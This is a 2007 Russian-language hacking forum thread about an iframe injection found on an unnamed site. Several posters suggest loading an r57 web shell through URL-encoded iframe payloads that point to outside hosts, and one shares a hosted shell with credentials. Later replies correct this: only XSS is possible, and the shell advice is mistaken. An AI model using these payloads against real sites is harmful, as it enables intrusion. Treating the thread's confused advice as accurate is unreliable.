Xss->...

Discussion in 'Уязвимости' started by Qwertison, 15 Oct 2007.

Thread Status:
Not open for further replies.
  1. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Есть уязвимость которая позволяет подставить
    Code:
    %3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
    в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя:))
     
  2. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    может это инклуд а не xss!? xss исполняется на уязвимом сайте
    если это инклуд ты можешь сделать так

    %3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

    или так
    %3CIFRAME%20SRC=http://hack.net/r57shell.php
     
    #2 kair, 15 Oct 2007
    Last edited: 15 Oct 2007
  3. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Code:
    %3CIFRAME%20SRC=http://ya.ru%20%3C
    яндекс появился))
    Code:
    %3CIFRAME%20SRC=http://hack.net/r57shell.php
    - что это даст?
     
    #3 Qwertison, 15 Oct 2007
    Last edited: 15 Oct 2007
  4. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    значит это инклуд!!! подставляй вместо яндекса шелл
     
  5. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(
     
  6. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.security-frog.org/hack/r57shell-inversa.txt
    и выполняй команды
    можешь взять любой шелл по адресу
    https://forum.antichat.ru/thread20314.html
     
    #6 kair, 15 Oct 2007
    Last edited: 15 Oct 2007
  7. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...
     
  8. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    вместо txt пиши php
    %3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php
     
    1 person likes this.
  9. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Error 404!

    /hack/r57shell-inversa.php
    File Not Found!
     
  10. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.
     
  11. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Фух, давай по инструкции просто пиши %3CIFRAME%20SRC=http://angerrr.nm.ru/sh.php%20%3C
    login: vasja
    pass: vasja
     
  12. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    я пробывал так......думаеш я дурак....не пашет оно!!!! вылазит окно с записанным исходным кодом шелла.....
     
  13. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    мда...
    Вы через ифрэйм пытаетесь получить шелл? мдя....
    Здесь тока Xss
     
    1 person likes this.
  14. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    тоесть через ифрейм нифига не сделаешь?
     
  15. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Можно провести Xss...
    Забудь про шелл...
    Т.к. в этом случае скрипт шелла выполняет хост на котором лежит шелл, но не сайт с ифрэмом
     
  16. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Думаю, ответ ясен.Ничего не сделаешь, инфрейм.И какой толк от хсс) Закрыто.
     
Thread Status:
Not open for further replies.